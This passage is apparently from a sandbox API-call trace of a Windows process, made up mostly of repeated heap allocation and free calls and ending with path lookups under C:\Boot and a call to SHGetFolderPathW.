hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.193] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.194] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.201] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0056.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.201] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.201] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.201] PathFindFileNameW (pszPath="") returned="" [0056.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.201] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.201] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.202] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, 